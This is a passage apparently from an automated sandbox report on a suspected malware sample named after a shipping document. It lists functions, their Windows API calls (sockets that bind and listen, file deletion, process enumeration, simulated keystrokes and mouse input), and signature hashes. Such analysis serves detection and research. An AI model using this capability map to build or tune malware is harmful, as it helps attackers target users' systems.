socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00111276
WSAGetLastError.WSOCK32 ref: 00111283
bind.WSOCK32(00000000,?,00000010), ref: 001112BA
WSAGetLastError.WSOCK32 ref: 001112C5
closesocket.WSOCK32(00000000), ref: 001112F4
listen.WSOCK32(00000000,00000005), ref: 00111303
WSAGetLastError.WSOCK32 ref: 0011130D
closesocket.WSOCK32(00000000), ref: 0011133C

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 08a8feba5dc2264b7fc246b2e16361932ce79ee4868dd31141eb5437c8a749ba
Instruction ID: ddb4100ad68282522a716a5eaffb0c0364e7a47d7b289e0c678baf5e9cdd9577
Opcode Fuzzy Hash: 08a8feba5dc2264b7fc246b2e16361932ce79ee4868dd31141eb5437c8a749ba
Instruction Fuzzy Hash: 84419331600150AFD724DF24C484BA9FBE6BF46314F288198D9569F296C771ECC2CBE1

Function 000FD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00093AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00093A97,?,?,00092E7F,?,?,?,00000000), ref: 00093AC2

Part of subcall function 000FE199: GetFileAttributesW.KERNEL32(?,000FCF95), ref: 000FE19A

FindFirstFileW.KERNEL32(?,?), ref: 000FD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 000FD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 000FD481
FindClose.KERNEL32(00000000), ref: 000FD498
FindClose.KERNEL32(00000000), ref: 000FD4A1

Strings

\*.*, xrefs: 000FD3F2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 27586975630b0c55572a0b21b1b7f1a5bc1ceae0eb35a0674873cf0518e2810f
Instruction ID: 1c4936a4d4d46767740c3db383985e3422d0204b2c5b15b5ad5c31a7c8ccdf9a
Opcode Fuzzy Hash: 27586975630b0c55572a0b21b1b7f1a5bc1ceae0eb35a0674873cf0518e2810f
Instruction Fuzzy Hash: 82317031008345ABC710EF64C8518FF77E9BFA2314F444A1EF5D593192EB20AA09EBA3

Function 000CE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 000CE645

Strings

1#INF, xrefs: 000CF852
1#SNAN, xrefs: 000CF844
1#IND, xrefs: 000CF83D
1#QNAN, xrefs: 000CF84B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 05b713a50348d08e4da914d169a8ca80287d059a2a71574619c09be46345991e
Instruction ID: 030d96a583a1337315d398ddfdfba56333589a4d2bc3eca370067fe964b1fdbf
Opcode Fuzzy Hash: 05b713a50348d08e4da914d169a8ca80287d059a2a71574619c09be46345991e
Instruction Fuzzy Hash: 4FC21672E086698BDB65CF28DD40BEEB7B6EB48304F1441EAD44DE7241E774AE818F41

Function 0010648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001064DC
CoInitialize.OLE32(00000000), ref: 00106639
CoCreateInstance.OLE32(0012FCF8,00000000,00000001,0012FB68,?), ref: 00106650
CoUninitialize.OLE32 ref: 001068D4

Strings

.lnk, xrefs: 001064BA, 00106524, 001065E0

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 36aead48284b666d6c81920eaaf7537c3b3c468460bbc27ade240de3cf3dbb93
Instruction ID: 994131991991286810471e6ca85c5d34d303ed653052ab3d4a9e4436e51645dd
Opcode Fuzzy Hash: 36aead48284b666d6c81920eaaf7537c3b3c468460bbc27ade240de3cf3dbb93
Instruction Fuzzy Hash: 8CD13A71508301AFD714EF24C891DABB7E8FF94704F40496DF5998B292EB71E905CB92

Function 001122DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 001122E8

Part of subcall function 0010E4EC: GetWindowRect.USER32(?,?), ref: 0010E504

GetDesktopWindow.USER32 ref: 00112312
GetWindowRect.USER32(00000000), ref: 00112319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00112355
GetCursorPos.USER32(?), ref: 00112381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001123DF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 1334dfd11d437a6cfd2804839eabceb117abcc643a67f5d1bd05d39c7e67c18a
Instruction ID: 2385d749e3c4efb98f7f73283d4badb46680b3f55b8869af32f7ccb3949070b6
Opcode Fuzzy Hash: 1334dfd11d437a6cfd2804839eabceb117abcc643a67f5d1bd05d39c7e67c18a
Instruction Fuzzy Hash: 2831D072504315AFC724DF14C845B9BB7A9FF88310F000929F995D7191DB74EA59CBD2

Function 00109B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00109B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00109C8B

Part of subcall function 00103874: GetInputState.USER32 ref: 001038CB
Part of subcall function 00103874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00103966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00109BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00109C75

Strings

*.*, xrefs: 00109B5D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 0a25b5acf84afc9975f3248c923778ccc37bdcaad58b541f2eca4f51e1473335
Instruction ID: 5d0f9f5a375ed5018c97d82cc16211c60a0da6784fb9ee16116a996817605f6b
Opcode Fuzzy Hash: 0a25b5acf84afc9975f3248c923778ccc37bdcaad58b541f2eca4f51e1473335
Instruction Fuzzy Hash: 4C419271D0020AAFDF14DF64C955AEEBBB8EF09310F244156E855A71D2EB709E94CFA0

Function 000A997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 000A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000A9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 000A9A4E
GetSysColor.USER32(0000000F), ref: 000A9B23
SetBkColor.GDI32(?,00000000), ref: 000A9B36

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 523129b30a624d141d28609168b5bef7885f2e2cfc973acf4e395b862fc327df
Instruction ID: 7e109bb0a17dc3defd1d9e41217cc3fed88bad248740203daa0d556228d6e567
Opcode Fuzzy Hash: 523129b30a624d141d28609168b5bef7885f2e2cfc973acf4e395b862fc327df
Instruction Fuzzy Hash: 25A14B70308490BEE778AABD9C48EBF36DDEB93344F15010AF502E6991CB259D51D2B3

Function 00111806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0011304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0011307A
Part of subcall function 0011304E: _wcslen.LIBCMT ref: 0011309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0011185D
WSAGetLastError.WSOCK32 ref: 00111884
bind.WSOCK32(00000000,?,00000010), ref: 001118DB
WSAGetLastError.WSOCK32 ref: 001118E6
closesocket.WSOCK32(00000000), ref: 00111915

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: a81dbb6f733b54c7dae2b2ee9272381bda01a25c418a504f6e701252cdb52b15
Instruction ID: 3423b9bda3ca724a9387383bf8e3ec9503b4ce62353b1a5760f31866bf87ff87
Opcode Fuzzy Hash: a81dbb6f733b54c7dae2b2ee9272381bda01a25c418a504f6e701252cdb52b15
Instruction Fuzzy Hash: 2351B671A00210AFDB14AF24C886FAAB7E5AB49718F44C05CFA195F3D3D771AD818BE1

Function 00121C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00121CC0
IsWindowEnabled.USER32 ref: 00121CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00121CDB
IsIconic.USER32 ref: 00121CE9
IsZoomed.USER32 ref: 00121CF7

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 3e415011d95cb9297cce7d0394c4a77f26a571ec8c2e73f03bc6c4eb46b2c9cd
Instruction ID: 35b16b824a14d4347f65efc5daf22ea1407e53067f7a638afb87fb57ea801808
Opcode Fuzzy Hash: 3e415011d95cb9297cce7d0394c4a77f26a571ec8c2e73f03bc6c4eb46b2c9cd
Instruction Fuzzy Hash: 2F21D6357402206FD720CF1AE844B6A7BA5EFA5314B198068E8498B351D771EC62CBD0

Function 00098060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 000983FA
VUUU, xrefs: 000983E8
ERCP, xrefs: 0009813C
VUUU, xrefs: 000D5DF0
VUUU, xrefs: 0009843C

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 456e77c1a7314b50bca8bc4820fdf0ec8de89c4771dda231a33cd234a938891e
Instruction ID: ce142a887d9a6e263ece183fb69eb7adbb0fa6a64be5aabc686a89f38ce49a2c
Opcode Fuzzy Hash: 456e77c1a7314b50bca8bc4820fdf0ec8de89c4771dda231a33cd234a938891e
Instruction Fuzzy Hash: C5A26E71E0061ACBDF74CF58C8447AEB7B1BF55310F2481AAE815AB385EB319E81DB60

Function 0011A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0011A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0011A6BA

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Process32NextW.KERNEL32(00000000,?), ref: 0011A79C
CloseHandle.KERNEL32(00000000), ref: 0011A7AB

Part of subcall function 000ACE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,000D3303,?), ref: 000ACE8A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 1486d53c2e6a1180847f0b79ae929aa8785326b136a1d2b2eabc2085f9edeea4
Instruction ID: ee7085bd360dac1f68cc769b7772144f0a770243bd84aa50751883effc30b94e
Opcode Fuzzy Hash: 1486d53c2e6a1180847f0b79ae929aa8785326b136a1d2b2eabc2085f9edeea4
Instruction Fuzzy Hash: D8516D71508301AFD714EF24C886AAFBBE8FF89754F40492DF58997252EB31D944CB92

Function 000FAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 000FAAAC
SetKeyboardState.USER32(00000080), ref: 000FAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 000FAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 000FAB88

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f110bdaba81fe70b74c5abdba8008a0cf5ad4f12fd75429ec48c0a3bf6dd6a34
Instruction ID: cb96d2f3f2b5ba3ceca7dfd89fcbee3d59693d8773267eaac98f9c2825a2decd
Opcode Fuzzy Hash: f110bdaba81fe70b74c5abdba8008a0cf5ad4f12fd75429ec48c0a3bf6dd6a34
Instruction Fuzzy Hash: A6311AB0B4020CAEFF358B64CC05BFE77E6AB46310F04421AF389569D2D3748995E7A2

Function 000CBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000CBB7F

Part of subcall function 000C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000), ref: 000C29DE
Part of subcall function 000C29C8: GetLastError.KERNEL32(00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000,00000000), ref: 000C29F0

GetTimeZoneInformation.KERNEL32 ref: 000CBB91
WideCharToMultiByte.KERNEL32(00000000,?,0016121C,000000FF,?,0000003F,?,?), ref: 000CBC09
WideCharToMultiByte.KERNEL32(00000000,?,00161270,000000FF,?,0000003F,?,?,?,0016121C,000000FF,?,0000003F,?,?), ref: 000CBC36

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: d1aacd02960a933c30601d6a0c61555ffb95c1f03164941902614a2f852009a6
Instruction ID: bcebfdab907467fa35b1496c1521ff2f2c662b1a8bce76eb62613c478fcfc24e
Opcode Fuzzy Hash: d1aacd02960a933c30601d6a0c61555ffb95c1f03164941902614a2f852009a6
Instruction Fuzzy Hash: FE31C070904245EFCB11DF69CC92A6DBBF8FF45710B28426EE120D72A2D7709E51DB90

Function 0010CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0010CE89
GetLastError.KERNEL32(?,00000000), ref: 0010CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0010CEFE

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: df886c7e07882d219fc2858a3bcabacee6e4478b49e4e99c6eb83abfcd606184
Instruction ID: 40fde4e15668695003f11233f59cd23ea8f9ebac7e00298f8b8e30d806510c17
Opcode Fuzzy Hash: df886c7e07882d219fc2858a3bcabacee6e4478b49e4e99c6eb83abfcd606184
Instruction Fuzzy Hash: A0218C71500705ABD730DF65C948BAABBF8EB40354F20462AE686D2191E7B0EE458FA0

Function 000FDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,000D5222), ref: 000FDBCE
GetFileAttributesW.KERNEL32(?), ref: 000FDBDD
FindFirstFileW.KERNEL32(?,?), ref: 000FDBEE
FindClose.KERNEL32(00000000), ref: 000FDBFA

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: d99f6739081a4b50bd5a807c93f06331dd4b287d8e69d62830fa66ff09a0ec45
Instruction ID: 365659a1e93e6cbb5d4d67f64fdefbda19831bc027d2495b9cf9f87f0e892b16
Opcode Fuzzy Hash: d99f6739081a4b50bd5a807c93f06331dd4b287d8e69d62830fa66ff09a0ec45
Instruction Fuzzy Hash: 35F0A030810919E782306B78AC0E8BE37AE9F01334B104703FA76C28E0EBB059A696D5

Function 000F8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 000F82AA

Strings

(, xrefs: 000F82F0
|, xrefs: 000F82DA

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: dcb159252383627c6a8bd3b241bce1e6444796043a36f420c4170c58000f307a
Instruction ID: 590320a949d8df0342e69c152e82d0ebecb855b58e27220153fda2d1421f55ee
Opcode Fuzzy Hash: dcb159252383627c6a8bd3b241bce1e6444796043a36f420c4170c58000f307a
Instruction Fuzzy Hash: 3F322575A007099FCB28CF59C481AAAB7F0FF48710B15C56EE59ADB7A1EB70E941CB40

Function 00105C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00105CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00105D17
FindClose.KERNEL32(?), ref: 00105D5F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: b0ddf23a59d400f6184860a26880840769cd3c6f3fa6f37a2bfd58849c6303a6
Instruction ID: f7b20b03a7f7eed7ff05a2c7097956566b10f977c4c51f4465265730b6c7f77a
Opcode Fuzzy Hash: b0ddf23a59d400f6184860a26880840769cd3c6f3fa6f37a2bfd58849c6303a6
Instruction Fuzzy Hash: 3A51B935604A019FC718CF68C494E9AB7E5FF0A324F14855EE99A8B3A2DB70EC44CF91

Function 000C2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 000C271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000C2724
UnhandledExceptionFilter.KERNEL32(?), ref: 000C2731

Memory Dump Source

